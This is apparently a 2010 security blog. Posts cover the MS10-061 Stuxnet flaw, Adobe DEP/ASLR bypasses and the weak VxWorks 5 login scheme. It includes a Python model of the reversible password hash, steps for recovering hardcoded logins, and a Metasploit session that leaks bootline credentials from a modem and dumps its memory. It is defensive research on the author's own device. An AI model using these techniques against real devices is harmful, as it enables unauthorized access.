As usual, Microsoft Patch Tuesday has been interesting this month.
The MS10-061 flaw affects the Print Spooler service, and seems to have been exploited by the infamous Stuxnet worm.
So, was it a "0day" (as many people tend to believe, like Kostya)? (no offense man ;)
I'll let you read the press article from Hakin9 magazine, issue n°4/2009; you can start reading at the bottom of page #29.
PS. For those of you who can read French, this article has also been quoted at the end of my "most viewed (and commented)" blog post. Hidden gem :)
Friday, September 17, 2010
Tuesday, September 14, 2010
Rapid publishing on recent Adobe flaws
"As usual", Adobe products (namely Adobe Reader and Flash Player) were recently targeted by "0day" attacks in the wild.
I did not have a look at the attacks myself, but several trusted sources (such as H. D. Moore) described the exploit as "great" because it is able to bypass DEP and ASLR on Windows 7.
Various exploitation tricks have been detailed on blogs such as Metasploit and VUPEN. ASLR bypass mostly relies on a library (namely "icucnv36.dll") not being ASLR-compatible and always being loaded at its preferred base address.
Now to the point: for years, I have been using the LookingGlass tool for preliminary triage before any application audit. It has been flying under the radar, but it works really well, and it is open source, compiled to .NET bytecode.
Here is the result for an up-to-date Adobe Reader 9.3.4. It looks like there are still avenues for DEP/ASLR bypass :)
Wednesday, September 01, 2010
Follow-up on VxWorks issue
Introduction
As a follow-up to H. D. Moore's research on VxWorks, I would like to share some personal thoughts on the matter.
I happen to have some experience with VxWorks, since this operating system used to be quite popular among broadband modem manufacturers. And I have always been fascinated by those SpyBoxes.
VxWorks software is now easier to get hold of, since trial/evaluation software is readily available. However, back in the days of VxWorks 5 (and older), things were a bit trickier.
HDM pointed out that VxWorks source code leaked on the PUDN Web site. As a rule of thumb, most of the world's intellectual property is available from the Chinese Internet. However, there are many other ways to browse the source (warning: all links below might disappear from the Internet without warning).
- Universities and student projects [1]
- Training courses [1]
- VxWorks enthusiasts [1] [2] [3]
- Third-party SDKs (for systems that have been built on the top of VxWorks) [1]
- Hardware hackers [1]
In the end, whatever you are looking for, the Internet has it :)
Authentication
Now let's have a look at the VxWorks authentication mechanism (described here and here).
Quoting usrConfig.c:
(…)
loginInit (); /* initialize login table */
shellLoginInstall (loginPrompt, NULL); /* install security program */
/* add additional users here as required */
loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);
}
#endif /* INCLUDE_SECURITY */
printLogo (); /* print out the banner page */
printf (" ");
printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());
printf (" ");
printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);
printf (" BSP version %s.\n\n", bspVersion ());
(…)
Authentication is optional: INCLUDE_SECURITY must be defined at compile time.
By default, loginUserAdd() must be called to create each user account dynamically; there is no user/password "file" (since there might be no filesystem at all on the target system).
Passwords are "encrypted" using a VxWorks-proprietary algorithm. Quoting http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html:
"Q: How can I create (encrypted) passwords?
A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.
I think it is sum( p[i] * i ^ i ) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper."
Therefore it is possible to log into any VxWorks 5 system in its default configuration, given the following steps:
- Grab a copy of the firmware (more about this later)
- Find the banner printing code
- Look a few opcodes before - you will presumably find call(s) to loginUserAdd().
- Reverse passwords (using pen and paper ;)
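A toy model of the scheme exactly as the quoted FAQ entry describes it, added here as an example (this is not VxWorks's or Tornado's own vxencrypt code). It assumes a 1-based index, a 32-bit accumulator and a constructed substitution alphabet, and shows why neither the multiplication nor the character substitution adds any secrecy: both steps are invertible, so the whole "encryption" collapses to an unsalted 32-bit checksum.

```python
MAGIC = 0x1E3A1D5            # the multiplier quoted in the FAQ entry
MASK = 0xFFFFFFFF            # assumed: a 32-bit unsigned accumulator
# Constructed substitution alphabet standing in for the "munged hex
# character set"; the real Tornado table is not given on the page.
MUNGED = "bZ8kQwr2JxmT5ncP"
HEX = "0123456789abcdef"


def raw_sum(password: bytes) -> int:
    """sum(p[i] * i ^ i) with C precedence, i.e. (p[i] * i) ^ i.
    A 1-based index is assumed (0-based would zero out the first byte)."""
    total = 0
    for i, byte in enumerate(password, start=1):
        total += (byte * i) ^ i
    return total & MASK


def vx_hash(password: bytes) -> int:
    """Unsalted 32-bit digest: the same password yields the same hash on
    every device, and there are at most 2**32 distinct outputs."""
    return (raw_sum(password) * MAGIC) & MASK


def encode(h: int) -> str:
    """Render the digest through the substituted hex alphabet."""
    return "".join(MUNGED[HEX.index(c)] for c in f"{h:08x}")


def decode(s: str) -> int:
    """The substitution is a bijection, so it hides nothing."""
    return int("".join(HEX[MUNGED.index(c)] for c in s), 16)


def unmix(h: int) -> int:
    """Undo the multiplication: MAGIC is odd, hence invertible mod 2**32,
    so the multiply step hides nothing either (needs Python >= 3.8)."""
    inv = pow(MAGIC, -1, 1 << 32)
    return (h * inv) & MASK


if __name__ == "__main__":
    pw = b"p220"              # sample taken from the bootline shown below
    stored = encode(vx_hash(pw))
    # Walk the stored string back to the raw checksum without any secret.
    print(stored, unmix(decode(stored)) == raw_sum(pw))
```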
Practical use case
Let's take the Trio3C broadband modem that was widely distributed by Neuf Telecom a few years ago. This model has been superseded by the NeufBox4, and you can find second-hand units for less than 5 euros nowadays. The Trio3C appears to be running VxWorks 5, and to have remote debugging enabled.
$ ./msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
=[ svn r10182 updated today (2010.08.29)
msf > use auxiliary/scanner/vxworks/wdbrpc_bootline
msf auxiliary(wdbrpc_bootline) > set RHOSTS 192.168.1.1/32
RHOSTS => 192.168.1.1/32
msf auxiliary(wdbrpc_bootline) > run
[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K
[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wdbrpc_bootline) > use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(wdbrpc_memory_dump) > set LPATH /tmp/memory.dmp
LPATH => /tmp/memory.dmp
msf auxiliary(wdbrpc_memory_dump) > run
[*] Attempting to dump system memory...
[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()
[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...
[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)
[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)
(...)
[*] Dumped 0x00fefba0 bytes.
[*] Auxiliary module execution completed
The complete memory dump disassembles cleanly in IDA Pro [*] (the base ROM address is kindly provided by the debugger).
Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)
[*] Actually not, I had to request a patch for the MIPS processor module :)